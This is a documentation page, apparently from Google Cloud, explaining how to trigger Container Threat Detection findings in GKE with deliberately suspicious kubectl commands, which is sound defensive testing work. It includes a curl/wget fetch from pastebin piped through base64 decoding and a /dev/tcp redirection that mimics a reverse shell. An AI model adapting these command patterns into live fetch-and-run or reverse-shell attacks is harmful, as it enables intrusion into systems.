Testing Container Threat Detection

This page explains how to verify that Container Threat Detection is working by intentionally triggering detectors and checking for findings. Container Threat Detection is a built-in service for the Security Command Center Premium tier. To view Container Threat Detection findings, it must be enabled in Security Command Center Services settings.

Before you begin

To detect potential threats to your containers, you need to make sure that your clusters are on a supported version of Google Kubernetes Engine (GKE). For more information, see using a supported GKE version.

Set environment variables

To test detectors, you use the Google Cloud Console and Cloud Shell. You can set environment variables in Cloud Shell to make it easier to run commands. The following variables are used to test all Container Threat Detection detectors.

  1. Go to the Google Cloud Console.

    Go to the Google Cloud Console

  2. Select the project that contains the container you want to use to test.

  3. Click Activate Cloud Shell.

  4. In Cloud Shell, set environment variables.

    1. The zone your cluster is in:

      export ZONE=CLUSTER_ZONE
      
    2. The project your container is in:

      export PROJECT=PROJECT_ID
      
    3. Your cluster name:

      export CLUSTER_NAME=CLUSTER_NAME
      

The variables are set. The following sections include instructions for testing Container Threat Detection detectors.

Added Binary Executed

To trigger an Added Binary Executed finding, drop a binary in your container and execute it. This example deploys the latest Ubuntu 18.04 image, copies /bin/ls to another location, and then executes it. The binary's execution is unexpected because the copy of the binary wasn't part of the original container image, even when that image is on Ubuntu 18.04, and containers are meant to be immutable.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plan:

    gcloud container clusters get-credentials $CLUSTER_NAME \
     --zone $ZONE \
     --project $PROJECT
    
  3. Drop a binary and execute it:

    tag="dropped-binary-$(date +%Y-%m-%d-%H-%M-%S)"
    kubectl run --restart=Never --rm=true --wait=true -i \
    --image marketplace.gcr.io/google/ubuntu1804:latest \
    "$tag" -- bash -c "cp /bin/ls /tmp/$tag; /tmp/$tag"
    

This test procedure should create an Added Binary Executed finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection.

Added Library Loaded

To trigger an Added Library Loaded finding, drop a library in your container and then load it. This example deploys the latest Ubuntu 18.04 image, copies /lib/x86_64-linux-gnu/libc.so.6 to another location, and then loads it using ld. The loaded library is unexpected because the copy of the library was not part of the original container image, even if that image is on Ubuntu 18.04, and containers are meant to be immutable.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plan:

    gcloud container clusters get-credentials $CLUSTER_NAME \
     --zone $ZONE \
     --project $PROJECT
    
  3. Drop a library and use ld to load it:

    tag="dropped-library-$(date +%Y-%m-%d-%H-%M-%S)"
    kubectl run --restart=Never --rm=true --wait=true -i \
    --image marketplace.gcr.io/google/ubuntu1804:latest \
    "$tag" -- bash -c "cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/$tag; /lib64/ld-linux-x86-64.so.2 /tmp/$tag"
    

This test procedure should create an Added Library Loaded finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection.

Malicious Script Executed

To trigger a Malicious Script Executed finding, execute a script in your container. This example deploys the latest Ubuntu 18.04 image, copies a script, and then executes it. The script is crafted to appear malicious to the detector, but doesn't cause malicious activity in your container.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plan:

    gcloud container clusters get-credentials $CLUSTER_NAME \
     --zone $ZONE \
     --project $PROJECT
    
  3. Execute a script in a new container:

     tag="malicious-script-$(date +%Y-%m-%d-%H-%M-%S)" \
     kubectl run --restart=Never --rm=true --wait=true -i \
     --image marketplace.gcr.io/google/ubuntu1804:latest "$tag" --command=true \
      -- bash -c "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;"
    

This test procedure creates a Malicious Script Executed finding that you can view in Security Command Center and in Cloud Logging if you've configured logging for Container Threat Detection.

Reverse Shell

To trigger a Reverse Shell finding, start a binary with stdin redirection to a TCP connected socket. This example starts /bin/echo with redirection to the Google public DNS 8.8.8.8 on the DNS port. Nothing is printed when you run this example. To prevent any external code injection through a man-in-the-middle (MITM) attack, this example doesn't use the /bin/bash binary.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plan:

    gcloud container clusters get-credentials $CLUSTER_NAME \
     --zone $ZONE \
     --project $PROJECT
    
  3. Start a binary with /bin/echo redirection to the Google public DNS:

    tag="reverse-shell-$(date +%Y-%m-%d-%H-%M-%S)"
    kubectl run --restart=Never --rm=true --wait=true -i \
    --image marketplace.gcr.io/google/ubuntu1804:latest \
    "$tag" -- bash -c "/bin/echo >& /dev/tcp/8.8.8.8/53 0>&1"
    

This test procedure creates a Reverse Shell finding you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection.

What's next